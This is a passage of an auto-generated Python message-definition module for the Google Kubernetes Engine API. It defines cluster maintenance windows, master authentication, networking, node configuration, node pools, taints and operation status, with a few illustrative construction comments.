accidentally remove other fields). Make a <code>get()</code> request to
the cluster to get the current resource version and include it with
requests to set the policy.
window: Specifies the maintenance window in which maintenance may be
performed.
"""
resourceVersion = _messages.StringField(1)
window = _messages.MessageField('MaintenanceWindow', 2)
class MaintenanceWindow(_messages.Message):
r"""MaintenanceWindow defines the maintenance window to be used for the
cluster.
Messages:
MaintenanceExclusionsValue: Exceptions to maintenance window. Non-
emergency maintenance should not occur in these windows.
Fields:
dailyMaintenanceWindow: DailyMaintenanceWindow specifies a daily
maintenance operation window.
maintenanceExclusions: Exceptions to maintenance window. Non-emergency
maintenance should not occur in these windows.
recurringWindow: RecurringWindow specifies some number of recurring time
periods for maintenance to occur. The time windows may be overlapping.
If no maintenance windows are set, maintenance can occur at any time.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class MaintenanceExclusionsValue(_messages.Message):
r"""Exceptions to maintenance window. Non-emergency maintenance should not
occur in these windows.
Messages:
AdditionalProperty: An additional property for a
MaintenanceExclusionsValue object.
Fields:
additionalProperties: Additional properties of type
MaintenanceExclusionsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MaintenanceExclusionsValue object.
Fields:
key: Name of the additional property.
value: A TimeWindow attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('TimeWindow', 2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
dailyMaintenanceWindow = _messages.MessageField('DailyMaintenanceWindow', 1)
maintenanceExclusions = _messages.MessageField('MaintenanceExclusionsValue', 2)
recurringWindow = _messages.MessageField('RecurringTimeWindow', 3)
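# Illustrative sketch, assuming keyword-argument construction: a maintenance
# policy wrapping the daily window type defined earlier in this module.
# resourceVersion is omitted here; it would normally be read back from the
# cluster before issuing an update.
#
#   policy = MaintenancePolicy(
#       window=MaintenanceWindow(
#           dailyMaintenanceWindow=DailyMaintenanceWindow(startTime='03:00')))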
class MasterAuth(_messages.Message):
r"""The authentication information for accessing the master endpoint.
Authentication can be done using HTTP basic auth or using client
certificates.
Fields:
clientCertificate: [Output only] Base64-encoded public certificate used by
clients to authenticate to the cluster endpoint.
clientCertificateConfig: Configuration for client certificate
authentication on the cluster. For clusters before v1.12, if no
configuration is specified, a client certificate is issued.
clientKey: [Output only] Base64-encoded private key used by clients to
authenticate to the cluster endpoint.
clusterCaCertificate: [Output only] Base64-encoded public certificate that
is the root of trust for the cluster.
password: The password to use for HTTP basic authentication to the master
endpoint. Because the master endpoint is open to the Internet, you
should create a strong password. If a password is provided for cluster
creation, username must be non-empty.
username: The username to use for HTTP basic authentication to the master
endpoint. For clusters v1.6.0 and later, basic authentication can be
disabled by leaving username unspecified (or setting it to the empty
string).
"""
clientCertificate = _messages.StringField(1)
clientCertificateConfig = _messages.MessageField('ClientCertificateConfig', 2)
clientKey = _messages.StringField(3)
clusterCaCertificate = _messages.StringField(4)
password = _messages.StringField(5)
username = _messages.StringField(6)
class MasterAuthorizedNetworksConfig(_messages.Message):
r"""Configuration options for the master authorized networks feature.
Enabled master authorized networks will disallow all external traffic to
access Kubernetes master through HTTPS except traffic from the given CIDR
blocks, Google Compute Engine Public IPs and Google Prod IPs.
Fields:
cidrBlocks: cidr_blocks define up to 50 external networks that could
access Kubernetes master through HTTPS.
enabled: Whether or not master authorized networks is enabled.
"""
cidrBlocks = _messages.MessageField('CidrBlock', 1, repeated=True)
enabled = _messages.BooleanField(2)
class MaxPodsConstraint(_messages.Message):
r"""Constraints applied to pods.
Fields:
maxPodsPerNode: Constraint enforced on the max num of pods per node.
"""
maxPodsPerNode = _messages.IntegerField(1)
class Metric(_messages.Message):
r"""Progress metric is (string, int|float|string) pair.
Fields:
doubleValue: For metrics with floating point value.
intValue: For metrics with integer value.
name: Required. Metric name, e.g., "nodes total", "percent done".
stringValue: For metrics with custom values (ratios, visual progress,
etc.).
"""
doubleValue = _messages.FloatField(1)
intValue = _messages.IntegerField(2)
name = _messages.StringField(3)
stringValue = _messages.StringField(4)
class NetworkConfig(_messages.Message):
r"""Parameters for cluster networking.
Fields:
disableDefaultSnat: Whether the cluster disables default in-node sNAT
rules. In-node sNAT rules will be disabled when this flag is true. When
set to false, default IP masquerade rules will be applied to the nodes
to prevent sNAT on cluster internal traffic. Deprecated. Use
default_snat_status instead
enableCloudNat: Whether GKE Cloud NAT is enabled for this cluster.
Requires that the cluster has already set
IPAllocationPolicy.use_ip_aliases to true. Deprecated: use
disable_default_snat instead.
enableIntraNodeVisibility: Whether Intra-node visibility is enabled for
this cluster. This enables flow logs for same node pod to pod traffic.
enablePrivateIpv6Access: Whether or not Private IPv6 access is enabled.
This enables direct connectivity from GKE pods to Google Cloud services
over gRPC.
enableSharedNetwork: Deprecated: This flag doesn't need to be flipped for
using shared VPC and it has no effect.
network: Output only. The relative name of the Google Compute Engine
network(/compute/docs/networks-and-firewalls#networks) to which the
cluster is connected. Example: projects/my-project/global/networks/my-
network
subnetwork: Output only. The relative name of the Google Compute Engine
[subnetwork](/compute/docs/vpc) to which the cluster is connected.
Example: projects/my-project/regions/us-central1/subnetworks/my-subnet
"""
disableDefaultSnat = _messages.BooleanField(1)
enableCloudNat = _messages.BooleanField(2)
enableIntraNodeVisibility = _messages.BooleanField(3)
enablePrivateIpv6Access = _messages.BooleanField(4)
enableSharedNetwork = _messages.BooleanField(5)
network = _messages.StringField(6)
subnetwork = _messages.StringField(7)
class NetworkPolicy(_messages.Message):
r"""Configuration options for the NetworkPolicy feature.
https://kubernetes.io/docs/concepts/services-networking/networkpolicies/
Enums:
ProviderValueValuesEnum: The selected network policy provider.
Fields:
enabled: Whether network policy is enabled on the cluster.
provider: The selected network policy provider.
"""
class ProviderValueValuesEnum(_messages.Enum):
r"""The selected network policy provider.
Values:
PROVIDER_UNSPECIFIED: Not set
CALICO: Tigera (Calico Felix).
"""
PROVIDER_UNSPECIFIED = 0
CALICO = 1
enabled = _messages.BooleanField(1)
provider = _messages.EnumField('ProviderValueValuesEnum', 2)
class NetworkPolicyConfig(_messages.Message):
r"""Configuration for NetworkPolicy. This only tracks whether the addon is
enabled or not on the Master; it does not track whether network policy is
enabled for the nodes.
Fields:
disabled: Whether NetworkPolicy is enabled for this cluster.
"""
disabled = _messages.BooleanField(1)
class NodeConfig(_messages.Message):
r"""Parameters that describe the nodes in a cluster.
Messages:
LabelsValue: The map of Kubernetes labels (key/value pairs) to be applied
to each node. These will be added in addition to any default label(s) that
Kubernetes may apply to the node. In case of conflict in label keys, the
applied set may differ depending on the Kubernetes version -- it's best
to assume the behavior is undefined and conflicts should be avoided. For
more information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/overview/working-with-
objects/labels/
MetadataValue: The metadata key/value pairs assigned to instances in the
cluster. Keys must conform to the regexp [a-zA-Z0-9-_]+ and be less
than 128 bytes in length. These are reflected as part of a URL in the
metadata server. Additionally, to avoid ambiguity, keys must not
conflict with any other metadata keys for the project or be one of the
reserved keys: "cluster-location" "cluster-name" "cluster-uid"
"configure-sh" "containerd-configure-sh" "enable-os-login" "gci-
ensure-gke-docker" "gci-metrics-enabled" "gci-update-strategy"
"instance-template" "kube-env" "startup-script" "user-data"
"disable-address-manager" "windows-startup-script-ps1" "common-psm1"
"k8s-node-setup-psm1" "install-ssh-psm1" "user-profile-psm1" "serial-
port-logging-enable" Values are free-form strings, and only have meaning
as interpreted by the image running in the instance. The only
restriction placed on them is that each value's size must be less than
or equal to 32 KB. The total size of all keys and values must be less
than 512 KB.
Fields:
accelerators: A list of hardware accelerators to be attached to each node.
See https://cloud.google.com/compute/docs/gpus for more information
about support for GPUs.
bootDiskKmsKey: The Customer Managed Encryption Key used to encrypt the
boot disk attached to each node in the node pool. This should be of the
form projects/[KEY_PROJECT_ID]/locations/[LOCATION]/keyRings/[RING_NAME]
/cryptoKeys/[KEY_NAME]. For more information about protecting resources
with Cloud KMS Keys please see:
https://cloud.google.com/compute/docs/disks/customer-managed-encryption
diskSizeGb: Size of the disk attached to each node, specified in GB. The
smallest allowed disk size is 10GB. If unspecified, the default disk
size is 100GB.
diskType: Type of the disk attached to each node (e.g. 'pd-standard' or
'pd-ssd') If unspecified, the default disk type is 'pd-standard'
imageType: The image type to use for this node. Note that for a given
image type, the latest version of it will be used.
kubeletConfig: Node kubelet configs.
labels: The map of Kubernetes labels (key/value pairs) to be applied to
each node. These will be added in addition to any default label(s) that
Kubernetes may apply to the node. In case of conflict in label keys, the
applied set may differ depending on the Kubernetes version -- it's best
to assume the behavior is undefined and conflicts should be avoided. For
more information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/overview/working-with-
objects/labels/
linuxNodeConfig: Parameters that can be configured on Linux nodes.
localSsdCount: The number of local SSD disks to be attached to the node.
The limit for this value is dependent upon the maximum number of disks
available on a machine per zone. See:
https://cloud.google.com/compute/docs/disks/local-ssd for more
information.
localSsdVolumeConfigs: Parameters for using Local SSD with extra options
as hostpath or local volumes
machineType: The name of a Google Compute Engine [machine
type](/compute/docs/machine-types) (e.g. `n1-standard-1`). If
unspecified, the default machine type is `n1-standard-1`.
metadata: The metadata key/value pairs assigned to instances in the
cluster. Keys must conform to the regexp [a-zA-Z0-9-_]+ and be less
than 128 bytes in length. These are reflected as part of a URL in the
metadata server. Additionally, to avoid ambiguity, keys must not
conflict with any other metadata keys for the project or be one of the
reserved keys: "cluster-location" "cluster-name" "cluster-uid"
"configure-sh" "containerd-configure-sh" "enable-os-login" "gci-
ensure-gke-docker" "gci-metrics-enabled" "gci-update-strategy"
"instance-template" "kube-env" "startup-script" "user-data"
"disable-address-manager" "windows-startup-script-ps1" "common-psm1"
"k8s-node-setup-psm1" "install-ssh-psm1" "user-profile-psm1" "serial-
port-logging-enable" Values are free-form strings, and only have meaning
as interpreted by the image running in the instance. The only
restriction placed on them is that each value's size must be less than
or equal to 32 KB. The total size of all keys and values must be less
than 512 KB.
minCpuPlatform: Minimum CPU platform to be used by this instance. The
instance may be scheduled on the specified or newer CPU platform.
Applicable values are the friendly names of CPU platforms, such as
<code>minCpuPlatform: "Intel Haswell"</code> or
<code>minCpuPlatform: "Intel Sandy Bridge"</code>. For more
information, read [how to specify min CPU
platform](https://cloud.google.com/compute/docs/instances/specify-min-
cpu-platform)
nodeGroup: The optional node group. Setting this field will assign
instances of this pool to run on the specified node group. This is
useful for running workloads on [sole tenant
nodes](/compute/docs/nodes/)
nodeImageConfig: The node image configuration to use for this node pool.
Note that this is only applicable for node pools using
image_type=CUSTOM.
oauthScopes: The set of Google API scopes to be made available on all of
the node VMs under the "default" service account. The following scopes
are recommended, but not required, and by default are not included: *
`https://www.googleapis.com/auth/compute` is required for mounting
persistent storage on your nodes. *
`https://www.googleapis.com/auth/devstorage.read_only` is required for
communicating with **gcr.io** (the [Google Container Registry
](/container-registry/)). If unspecified, no scopes are added, unless
Cloud Logging or Cloud Monitoring are enabled, in which case their
required scopes will be added.
preemptible: Whether the nodes are created as preemptible VM instances.
See: https://cloud.google.com/compute/docs/instances/preemptible for
more information about preemptible VM instances.
reservationAffinity: The optional reservation affinity. Setting this field
will apply the specified [Zonal Compute
Reservation](/compute/docs/instances/reserving-zonal-resources) to this
node pool.
sandboxConfig: Sandbox configuration for this node.
serviceAccount: The Google Cloud Platform Service Account to be used by
the node VMs. Specify the email address of the Service Account;
otherwise, if no Service Account is specified, the "default" service
account is used.
shieldedInstanceConfig: Shielded Instance options.
tags: The list of instance tags applied to all nodes. Tags are used to
identify valid sources or targets for network firewalls and are
specified by the client during cluster or node pool creation. Each tag
within the list must comply with RFC1035.
taints: List of kubernetes taints to be applied to each node. For more
information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/configuration/taint-and-toleration/
workloadMetadataConfig: The workload metadata configuration for this node.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class LabelsValue(_messages.Message):
r"""The map of Kubernetes labels (key/value pairs) to be applied to each
node. These will be added in addition to any default label(s) that Kubernetes
may apply to the node. In case of conflict in label keys, the applied set
may differ depending on the Kubernetes version -- it's best to assume the
behavior is undefined and conflicts should be avoided. For more
information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/
Messages:
AdditionalProperty: An additional property for a LabelsValue object.
Fields:
additionalProperties: Additional properties of type LabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a LabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
@encoding.MapUnrecognizedFields('additionalProperties')
class MetadataValue(_messages.Message):
r"""The metadata key/value pairs assigned to instances in the cluster.
Keys must conform to the regexp [a-zA-Z0-9-_]+ and be less than 128 bytes
in length. These are reflected as part of a URL in the metadata server.
Additionally, to avoid ambiguity, keys must not conflict with any other
metadata keys for the project or be one of the reserved keys: "cluster-
location" "cluster-name" "cluster-uid" "configure-sh" "containerd-
configure-sh" "enable-os-login" "gci-ensure-gke-docker" "gci-metrics-
enabled" "gci-update-strategy" "instance-template" "kube-env"
"startup-script" "user-data" "disable-address-manager" "windows-
startup-script-ps1" "common-psm1" "k8s-node-setup-psm1" "install-ssh-
psm1" "user-profile-psm1" "serial-port-logging-enable" Values are free-
form strings, and only have meaning as interpreted by the image running in
the instance. The only restriction placed on them is that each value's
size must be less than or equal to 32 KB. The total size of all keys and
values must be less than 512 KB.
Messages:
AdditionalProperty: An additional property for a MetadataValue object.
Fields:
additionalProperties: Additional properties of type MetadataValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a MetadataValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
accelerators = _messages.MessageField('AcceleratorConfig', 1, repeated=True)
bootDiskKmsKey = _messages.StringField(2)
diskSizeGb = _messages.IntegerField(3, variant=_messages.Variant.INT32)
diskType = _messages.StringField(4)
imageType = _messages.StringField(5)
kubeletConfig = _messages.MessageField('NodeKubeletConfig', 6)
labels = _messages.MessageField('LabelsValue', 7)
linuxNodeConfig = _messages.MessageField('LinuxNodeConfig', 8)
localSsdCount = _messages.IntegerField(9, variant=_messages.Variant.INT32)
localSsdVolumeConfigs = _messages.MessageField('LocalSsdVolumeConfig', 10, repeated=True)
machineType = _messages.StringField(11)
metadata = _messages.MessageField('MetadataValue', 12)
minCpuPlatform = _messages.StringField(13)
nodeGroup = _messages.StringField(14)
nodeImageConfig = _messages.MessageField('CustomImageConfig', 15)
oauthScopes = _messages.StringField(16, repeated=True)
preemptible = _messages.BooleanField(17)
reservationAffinity = _messages.MessageField('ReservationAffinity', 18)
sandboxConfig = _messages.MessageField('SandboxConfig', 19)
serviceAccount = _messages.StringField(20)
shieldedInstanceConfig = _messages.MessageField('ShieldedInstanceConfig', 21)
tags = _messages.StringField(22, repeated=True)
taints = _messages.MessageField('NodeTaint', 23, repeated=True)
workloadMetadataConfig = _messages.MessageField('WorkloadMetadataConfig', 24)
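# Illustrative sketch, assuming keyword-argument construction: a basic node
# configuration using the documented defaults for machine type, disk size and
# disk type; the OAuth scope is the read-only storage scope recommended above.
#
#   node_config = NodeConfig(
#       machineType='n1-standard-1',
#       diskSizeGb=100,
#       diskType='pd-standard',
#       oauthScopes=['https://www.googleapis.com/auth/devstorage.read_only'],
#       preemptible=False,
#   )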
class NodeKubeletConfig(_messages.Message):
r"""Node kubelet configs. NOTE: This is an Alpha only API.
Fields:
cpuCfsQuota: Enable CPU CFS quota enforcement for containers that specify
CPU limits. If this option is enabled, kubelet uses CFS quota
(https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt) to
enforce container CPU limits. Otherwise, CPU limits will not be enforced
at all. Disable this option to mitigate CPU throttling problems while
still having your pods be in the Guaranteed QoS class by specifying the
CPU limits. The default value is 'true' if unspecified.
cpuCfsQuotaPeriod: Set the CPU CFS quota period value 'cpu.cfs_period_us'.
The string must be a sequence of decimal numbers, each with optional
fraction and a unit suffix, such as "300ms". Valid time units are "ns",
"us" (or "\xb5s"), "ms", "s", "m", "h". The value must be a positive
duration.
cpuManagerPolicy: Control the CPU management policy on the node. See
https://kubernetes.io/docs/tasks/administer-cluster/cpu-management-
policies/ The following values are allowed. - "none": the default,
which represents the existing scheduling behavior. - "static": allows
pods with certain resource characteristics to be granted
increased CPU affinity and exclusivity on the node.
"""
cpuCfsQuota = _messages.BooleanField(1)
cpuCfsQuotaPeriod = _messages.StringField(2)
cpuManagerPolicy = _messages.StringField(3)
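# Illustrative sketch, assuming keyword-argument construction: kubelet
# settings using the values documented above (static CPU manager, CFS quota
# enforcement with a 300ms period).
#
#   kubelet_config = NodeKubeletConfig(
#       cpuManagerPolicy='static',
#       cpuCfsQuota=True,
#       cpuCfsQuotaPeriod='300ms',
#   )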
class NodeManagement(_messages.Message):
r"""NodeManagement defines the set of node management services turned on for
the node pool.
Fields:
autoRepair: Whether the nodes will be automatically repaired.
autoUpgrade: Whether the nodes will be automatically upgraded.
upgradeOptions: Specifies the Auto Upgrade knobs for the node pool.
"""
autoRepair = _messages.BooleanField(1)
autoUpgrade = _messages.BooleanField(2)
upgradeOptions = _messages.MessageField('AutoUpgradeOptions', 3)
class NodePool(_messages.Message):
r"""NodePool contains the name and configuration for a cluster's node pool.
Node pools are a set of nodes (i.e. VMs), with a common configuration and
specification, under the control of the cluster master. They may have a set
of Kubernetes labels applied to them, which may be used to reference them
during pod scheduling. They may also be resized up or down, to accommodate
the workload.
Enums:
StatusValueValuesEnum: [Output only] The status of the nodes in this pool
instance.
Fields:
autoscaling: Autoscaler configuration for this NodePool. Autoscaler is
enabled only if a valid configuration is present.
conditions: Which conditions caused the current node pool state.
config: The node configuration of the pool.
initialNodeCount: The initial node count for the pool. You must ensure
that your Compute Engine <a href="/compute/docs/resource-
quotas">resource quota</a> is sufficient for this number of instances.
You must also have available firewall and routes quota.
instanceGroupUrls: [Output only] The resource URLs of the [managed
instance groups](/compute/docs/instance-groups/creating-groups-of-
managed-instances) associated with this node pool.
locations: The list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the NodePool's nodes
should be located.
management: NodeManagement configuration for this NodePool.
maxPodsConstraint: The constraint on the maximum number of pods that can
be run simultaneously on a node in the node pool.
name: The name of the node pool.
podIpv4CidrSize: [Output only] The pod CIDR block size per node in this
node pool.
resourceVersion: Server-defined resource version (etag).
selfLink: [Output only] Server-defined URL for the resource.
status: [Output only] The status of the nodes in this pool instance.
statusMessage: [Output only] Additional information about the current
status of this node pool instance, if available. Deprecated, use the
field conditions instead.
upgradeSettings: Upgrade settings control disruption and speed of the
upgrade.
version: The Kubernetes version running on the nodes in this pool.
"""
class StatusValueValuesEnum(_messages.Enum):
r"""[Output only] The status of the nodes in this pool instance.
Values:
STATUS_UNSPECIFIED: Not set.
PROVISIONING: The PROVISIONING state indicates the node pool is being
created.
RUNNING: The RUNNING state indicates the node pool has been created and
is fully usable.
RUNNING_WITH_ERROR: The RUNNING_WITH_ERROR state indicates the node pool
has been created and is partially usable. Some error state has
occurred and some functionality may be impaired. Customer may need to
reissue a request or trigger a new update.
RECONCILING: The RECONCILING state indicates that some work is actively
being done on the node pool, such as upgrading node software. Details
can be found in the `statusMessage` field.
STOPPING: The STOPPING state indicates the node pool is being deleted.
ERROR: The ERROR state indicates the node pool may be unusable. Details
can be found in the `statusMessage` field.
"""
STATUS_UNSPECIFIED = 0
PROVISIONING = 1
RUNNING = 2
RUNNING_WITH_ERROR = 3
RECONCILING = 4
STOPPING = 5
ERROR = 6
autoscaling = _messages.MessageField('NodePoolAutoscaling', 1)
conditions = _messages.MessageField('StatusCondition', 2, repeated=True)
config = _messages.MessageField('NodeConfig', 3)
initialNodeCount = _messages.IntegerField(4, variant=_messages.Variant.INT32)
instanceGroupUrls = _messages.StringField(5, repeated=True)
locations = _messages.StringField(6, repeated=True)
management = _messages.MessageField('NodeManagement', 7)
maxPodsConstraint = _messages.MessageField('MaxPodsConstraint', 8)
name = _messages.StringField(9)
podIpv4CidrSize = _messages.IntegerField(10, variant=_messages.Variant.INT32)
resourceVersion = _messages.StringField(11)
selfLink = _messages.StringField(12)
status = _messages.EnumField('StatusValueValuesEnum', 13)
statusMessage = _messages.StringField(14)
upgradeSettings = _messages.MessageField('UpgradeSettings', 15)
version = _messages.StringField(16)
class NodePoolAutoscaling(_messages.Message):
r"""NodePoolAutoscaling contains information required by cluster autoscaler
to adjust the size of the node pool to the current cluster usage.
Fields:
autoprovisioned: Can this node pool be deleted automatically.
enabled: Is autoscaling enabled for this node pool.
maxNodeCount: Maximum number of nodes in the NodePool. Must be >=
min_node_count. There has to be enough quota to scale up the cluster.
minNodeCount: Minimum number of nodes in the NodePool. Must be >= 1 and <=
max_node_count.
"""
autoprovisioned = _messages.BooleanField(1)
enabled = _messages.BooleanField(2)
maxNodeCount = _messages.IntegerField(3, variant=_messages.Variant.INT32)
minNodeCount = _messages.IntegerField(4, variant=_messages.Variant.INT32)
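# Illustrative sketch, assuming keyword-argument construction: autoscaling a
# node pool between 1 and 5 nodes.
#
#   autoscaling = NodePoolAutoscaling(enabled=True, minNodeCount=1,
#                                     maxNodeCount=5)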
class NodeTaint(_messages.Message):
r"""Kubernetes taint is comprised of three fields: key, value, and effect.
Effect can only be one of three types: NoSchedule, PreferNoSchedule or
NoExecute. For more information, including usage and the valid values, see:
https://kubernetes.io/docs/concepts/configuration/taint-and-toleration/
Enums:
EffectValueValuesEnum: Effect for taint.
Fields:
effect: Effect for taint.
key: Key for taint.
value: Value for taint.
"""
class EffectValueValuesEnum(_messages.Enum):
r"""Effect for taint.
Values:
EFFECT_UNSPECIFIED: Not set
NO_SCHEDULE: NoSchedule
PREFER_NO_SCHEDULE: PreferNoSchedule
NO_EXECUTE: NoExecute
"""
EFFECT_UNSPECIFIED = 0
NO_SCHEDULE = 1
PREFER_NO_SCHEDULE = 2
NO_EXECUTE = 3
effect = _messages.EnumField('EffectValueValuesEnum', 1)
key = _messages.StringField(2)
value = _messages.StringField(3)
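# Illustrative sketch, assuming keyword-argument construction: a taint that
# keeps pods without a matching toleration off the node (key and value are
# placeholders).
#
#   taint = NodeTaint(
#       key='dedicated',
#       value='gpu',
#       effect=NodeTaint.EffectValueValuesEnum.NO_SCHEDULE,
#   )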
class Operation(_messages.Message):
r"""This operation resource represents operations that may have happened or
are happening on the cluster. All fields are output only.
Enums:
OperationTypeValueValuesEnum: The operation type.
StatusValueValuesEnum: The current status of the operation.
Fields:
clusterConditions: Which conditions caused the current cluster state.
detail: Detailed operation progress, if available.
endTime: [Output only] The time the operation completed, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
location: [Output only] The name of the Google Compute Engine
[zone](/compute/docs/regions-zones/regions-zones#available) or
[region](/compute/docs/regions-zones/regions-zones#available) in which
the cluster resides.
name: The server-assigned ID for the operation.
nodepoolConditions: Which conditions caused the current node pool state.
operationType: The operation type.
progress: Output only. [Output only] Progress information for an
operation.
selfLink: Server-defined URL for the resource.
startTime: [Output only] The time the operation started, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
status: The current status of the operation.
statusMessage: Output only. If an error has occurred, a textual
description of the error.
targetLink: Server-defined URL for the target of the operation.
zone: The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the operation is taking
place. This field is deprecated, use location instead.
"""
class OperationTypeValueValuesEnum(_messages.Enum):
r"""The operation type.
Values:
TYPE_UNSPECIFIED: Not set.
CREATE_CLUSTER: Cluster create.
DELETE_CLUSTER: Cluster delete.
UPGRADE_MASTER: A master upgrade.
UPGRADE_NODES: A node upgrade.
REPAIR_CLUSTER: Cluster repair.
UPDATE_CLUSTER: Cluster update.
CREATE_NODE_POOL: Node pool create.
DELETE_NODE_POOL: Node pool delete.
SET_NODE_POOL_MANAGEMENT: Set node pool management.
AUTO_REPAIR_NODES: Automatic node pool repair.
AUTO_UPGRADE_NODES: Automatic node upgrade.
SET_LABELS: Set labels.
SET_MASTER_AUTH: Set/generate master auth materials
SET_NODE_POOL_SIZE: Set node pool size.
SET_NETWORK_POLICY: Updates network policy for a cluster.
SET_MAINTENANCE_POLICY: Set the maintenance policy.
UPDATE_IP_ALLOCATION_POLICY: Update cluster IP allocation policy.
"""
TYPE_UNSPECIFIED = 0
CREATE_CLUSTER = 1
DELETE_CLUSTER = 2
UPGRADE_MASTER = 3
UPGRADE_NODES = 4
REPAIR_CLUSTER = 5
UPDATE_CLUSTER = 6
CREATE_NODE_POOL = 7
DELETE_NODE_POOL = 8
SET_NODE_POOL_MANAGEMENT = 9
AUTO_REPAIR_NODES = 10
AUTO_UPGRADE_NODES = 11
SET_LABELS = 12
SET_MASTER_AUTH = 13
SET_NODE_POOL_SIZE = 14
SET_NETWORK_POLICY = 15
SET_MAINTENANCE_POLICY = 16
UPDATE_IP_ALLOCATION_POLICY = 17
class StatusValueValuesEnum(_messages.Enum):
r"""The current status of the operation.
Values:
STATUS_UNSPECIFIED: Not set.
PENDING: The operation has been created.
RUNNING: The operation is currently running.
DONE: The operation is done, either cancelled or completed.
ABORTING: The operation is aborting.
"""
STATUS_UNSPECIFIED = 0
PENDING = 1
RUNNING = 2
DONE = 3
ABORTING = 4
clusterConditions = _messages.MessageField('StatusCondition', 1, repeated=True)
detail = _messages.StringField(2)
endTime = _messages.StringField(3)
location = _messages.StringField(4)
name = _messages.StringField(5)
nodepoolConditions = _messages.MessageField('StatusCondition', 6, repeated=True)
operationType = _messages.EnumField('OperationTypeValueValuesEnum', 7)
progress = _messages.MessageField('OperationProgress', 8)
selfLink = _messages.StringField(9)
startTime = _messages.StringField(10)
status = _messages.EnumField('StatusValueValuesEnum', 11)
statusMessage = _messages.StringField(12)
targetLink = _messages.StringField(13)
zone = _messages.StringField(14)
class OperationProgress(_messages.Message):
r"""Information about operation (or operation stage) progress.
Enums:
StatusValueValuesEnum: Status of an operation stage. Unset for single-
stage operations.
Fields:
metrics: Progress metric bundle, for example: metrics: [{name: "nodes
done", int_value: 15}, {name: "nodes total",
int_value: 32}] or metrics: [{name: "progress", double_value:
0.56}, {name: "progress scale", double_value: 1.0}]
name: A non-parameterized string describing an operation stage. Unset for
single-stage operations.
stages: Substages of an operation or a stage.
status: Status of an operation stage. Unset for single-stage operations.
"""
class StatusValueValuesEnum(_messages.Enum):
r"""Status of an operation stage. Unset for single-stage operations.
Values:
STATUS_UNSPECIFIED: Not set.
PENDING: The operation has been created.
RUNNING: The operation is currently running.
DONE: The operation is done, either cancelled or completed.
ABORTING: The operation is aborting.
"""
STATUS_UNSPECIFIED = 0
PENDING = 1
RUNNING = 2
DONE = 3
ABORTING = 4
metrics = _messages.MessageField('Metric', 1, repeated=True)
name = _messages.StringField(2)
stages = _messages.MessageField('OperationProgress', 3, repeated=True)
status = _messages.EnumField('StatusValueValuesEnum', 4)
class PodSecurityPolicyConfig(_messages.Message):
r"""Configuration for the PodSecurityPolicy feature.
Fields:
enabled: Enable the PodSecurityPolicy controller for this cluster. If
enabled, pods must be valid under a PodSecurityPolicy to be created.
"""
enabled = _messages.BooleanField(1)
class PremiumConfig(_messages.Message):
r"""PremiumConfig is the configuration for all premium features and tiers.
Fields:
features: The features that GKE provides.
tiers: The tiers that are part of the premium offering.
"""
features = _messages.MessageField('FeatureConfig', 1, repeated=True)
tiers = _messages.MessageField('TierConfig', 2, repeated=True)
class PrivateClusterConfig(_messages.Message):
r"""Configuration options for private clusters.
Fields:
enablePeeringRouteSharing: Whether to enable route sharing over the
network peering.
enablePrivateEndpoint: Whether the master's internal IP address is used as
the cluster endpoint.
enablePrivateNodes: Whether nodes have internal IP addresses only. If
enabled, all nodes are given only RFC 1918 private addresses and
communicate with the master via private networking.
masterIpv4CidrBlock: The IP range in CIDR notation to use for the hosted
master network. This range will be used for assigning internal IP
addresses to the master or set of masters, as well as the ILB VIP. This
range must not overlap with any other ranges in use within the cluster's
network.
peeringName: Output only. The peering name in the customer VPC used by
this cluster.
privateEndpoint: Output only. The internal IP address of this cluster's
endpoint.
publicEndpoint: Output only. The external IP address of this cluster's
endpoint.
"""
enablePeeringRouteSharing = _messages.BooleanField(1)
enablePrivateEndpoint = _messages.BooleanField(2)
enablePrivateNodes = _messages.BooleanField(3)
masterIpv4CidrBlock = _messages.StringField(4)
peeringName = _messages.StringField(5)
privateEndpoint = _messages.StringField(6)
publicEndpoint = _messages.StringField(7)
class PrivateIPv6Status(_messages.Message):
r"""PrivateIPv6Status contains the desired state of the IPv6 fast path on
this cluster. Private IPv6 access allows direct high-speed communication
from GKE pods to gRPC Google Cloud services over IPv6.
Fields:
enabled: Enables private IPv6 access to Google Cloud services for this
cluster.
"""
enabled = _messages.BooleanField(1)
class RecurringTimeWindow(_messages.Message):
r"""Represents an arbitrary window of time that recurs.
Fields:
recurrence: An RRULE (https://tools.ietf.org/html/rfc5545#section-3.8.5.3)
for how this window recurs. They go on for the span of time between the
start and end time. For example, to have something repeat every
weekday, you'd use: <code>FREQ=WEEKLY;BYDAY=MO,TU,WE,TH,FR</code> To
repeat some window daily (equivalent to the DailyMaintenanceWindow):
<code>FREQ=DAILY</code> For the first weekend of every month:
<code>FREQ=MONTHLY;BYSETPOS=1;BYDAY=SA,SU</code> This specifies how
frequently the window starts. E.g., if you wanted to have a 9-5 UTC-4
window every weekday, you'd use something like: <code> start time =
2019-01-01T09:00:00-0400 end time = 2019-01-01T17:00:00-0400
recurrence = FREQ=WEEKLY;BYDAY=MO,TU,WE,TH,FR </code> Windows can span
multiple days. E.g., to make the window encompass every weekend from
midnight Saturday till the last minute of Sunday UTC: <code> start
time = 2019-01-05T00:00:00Z end time = 2019-01-07T23:59:00Z
recurrence = FREQ=WEEKLY;BYDAY=SA </code> Note the start and end time's
specific dates are largely arbitrary except to specify duration of the
